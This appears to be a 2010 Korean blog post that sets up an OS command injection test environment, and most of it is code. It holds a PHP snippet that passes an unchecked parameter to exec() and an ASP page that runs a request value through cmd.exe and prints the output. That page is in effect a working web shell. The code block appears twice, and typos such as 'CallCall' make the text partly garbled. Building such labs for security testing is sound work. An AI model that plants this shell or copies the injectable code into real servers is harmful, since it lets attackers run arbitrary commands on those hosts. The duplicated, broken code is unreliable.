OS Command Injection 환경예제
tips 2010. 1. 4. 14:05 |PHP
<?php
$last = exec($param,$output,$return);
print_r($output);
echo "Return [$return]";
?>
ASP
<%
szCMD = request("tex")
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
szTempFile = "C:\ttt.txt"
Call oScript.Run ("cmd.exe /c " & szCMD & ">" & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
%>
<HTML>
<BODY>
<PRE>
<br>
<%
If (IsObject(oFile)) Then
' -- Read the output from our command andand remove the temp file -- '
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
CallCall oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
<?php
$last = exec($param,$output,$return);
print_r($output);
echo "Return [$return]";
?>
ASP
<%
szCMD = request("tex")
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
szTempFile = "C:\ttt.txt"
Call oScript.Run ("cmd.exe /c " & szCMD & ">" & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
%>
<HTML>
<BODY>
<PRE>
<br>
<%
If (IsObject(oFile)) Then
' -- Read the output from our command andand remove the temp file -- '
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
CallCall oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
'tips' 카테고리의 다른 글
| 윈도우 확장자 한꺼번에 바꾸기 (0) | 2010.01.25 |
|---|---|
| 파일업로드 예제 (0) | 2010.01.05 |
| DEP 해제 (0) | 2009.12.29 |
| Apache DefaultCharset (0) | 2009.12.04 |
| IE 8.0에서 세션공유기능 해제 (0) | 2009.11.17 |